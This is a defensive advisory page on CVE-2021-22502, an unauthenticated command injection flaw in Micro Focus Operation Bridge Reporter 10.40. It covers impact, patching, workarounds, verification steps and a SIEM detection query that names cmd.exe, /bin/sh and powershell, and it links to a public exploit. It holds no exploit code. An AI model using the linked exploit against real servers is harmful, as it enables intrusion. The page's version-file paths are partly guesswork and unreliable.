CVE-2021-22502 – CVE-2021-22502 is an unauthenticated command in... (How to Fix)

Q: What is the severity of CVE-2021-22502?

CVE-2021-22502 has a CVSS score of 9.8 (CRITICAL). CVE-2021-22502 is an unauthenticated command injection vulnerability in Micro Focus Operation Bridge Reporter (OBR) that allows remote attackers to execute arbitrary commands on the server. This affects OBR version 10.40, potentially giving attackers full control over affected systems without requiring authentication.

📋 TL;DR

CVE-2021-22502 is an unauthenticated command injection vulnerability in Micro Focus Operation Bridge Reporter (OBR) that allows remote attackers to execute arbitrary commands on the server. This affects OBR version 10.40, potentially giving attackers full control over affected systems without requiring authentication.

💻 Affected Systems

Products:

Micro Focus Operation Bridge Reporter

Versions: 10.40

Operating Systems: Windows, Linux

Default Config Vulnerable: ⚠️ Yes

Notes: All installations of OBR 10.40 are vulnerable regardless of configuration. The vulnerability exists in the web interface component.

📦 What is this software?

Operation Bridge Reporter by Microfocus

View all CVEs affecting Operation Bridge Reporter →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the OBR server leading to data theft, lateral movement within the network, ransomware deployment, or persistent backdoor installation.

🟠

Likely Case

Attackers gain shell access to the OBR server, allowing them to steal sensitive monitoring data, install cryptocurrency miners, or use the server as a pivot point for further attacks.

🟢

If Mitigated

Limited impact due to network segmentation, proper patching, and security controls preventing command execution or limiting its scope.

🌐 Internet-Facing: HIGH - The vulnerability is unauthenticated and publicly exploitable, making internet-facing instances immediate targets for automated attacks.

🏢 Internal Only: HIGH - Even internally, the unauthenticated nature makes it easily exploitable by any internal threat actor or compromised system.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Multiple public exploit scripts are available, including on Packet Storm Security. The vulnerability requires no authentication and minimal technical skill to exploit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 10.40 Update 1 or later

Vendor Advisory: https://softwaresupport.softwaregrp.com/doc/KM03775947

Restart Required: Yes

Instructions:

1. Download the patch from Micro Focus Support Portal. 2. Backup your OBR installation. 3. Apply the patch following Micro Focus instructions. 4. Restart the OBR service. 5. Verify the patch is applied successfully.

🔧 Temporary Workarounds

Network Isolation

all

Restrict network access to OBR web interface to only trusted administrative networks

Use firewall rules to block external access to OBR ports (typically 8080, 8443)

Web Application Firewall

all

Deploy WAF with command injection protection rules

Configure WAF to block requests containing shell metacharacters and suspicious patterns

🧯 If You Can't Patch

Immediately isolate the OBR server from internet access and restrict internal access to only necessary administrative networks
Implement strict network monitoring and alerting for any suspicious commands or processes originating from the OBR server

🔍 How to Verify

Check if Vulnerable:

Check if OBR version is 10.40 by accessing the web interface and viewing version information, or check installation directory for version files.

Check Version:

On Windows: Check registry at HKLM\SOFTWARE\Micro Focus\OBR\Version. On Linux: Check /opt/OBR/version.txt or similar installation directory.

Verify Fix Applied:

Verify the version shows 10.40 Update 1 or later, and test that command injection attempts no longer succeed.

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in system logs
Suspicious processes spawned by OBR service
Web logs showing command injection patterns in URLs

Network Indicators:

Unusual outbound connections from OBR server
Traffic to known malicious IPs or domains
Unexpected port scans originating from OBR server

SIEM Query:

source="OBR_logs" AND ("cmd.exe" OR "/bin/sh" OR "powershell" OR suspicious command patterns)

📊 Metadata

CVE ID: CVE-2021-22502

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: February 8, 2021

Last Updated: October 27, 2025

🔗 References

http://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html Exploit,Third Party Advisory,VDB Entry
https://softwaresupport.softwaregrp.com/doc/KM03775947 Vendor Advisory
https://www.zerodayinitiative.com/advisories/ZDI-21-153/ Third Party Advisory,VDB Entry
https://www.zerodayinitiative.com/advisories/ZDI-21-154/ Third Party Advisory,VDB Entry
http://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html Exploit,Third Party Advisory,VDB Entry
https://softwaresupport.softwaregrp.com/doc/KM03775947 Vendor Advisory
https://www.zerodayinitiative.com/advisories/ZDI-21-153/ Third Party Advisory,VDB Entry
https://www.zerodayinitiative.com/advisories/ZDI-21-154/ Third Party Advisory,VDB Entry
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22502 US Government Resource

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-22502, you might also want to check these: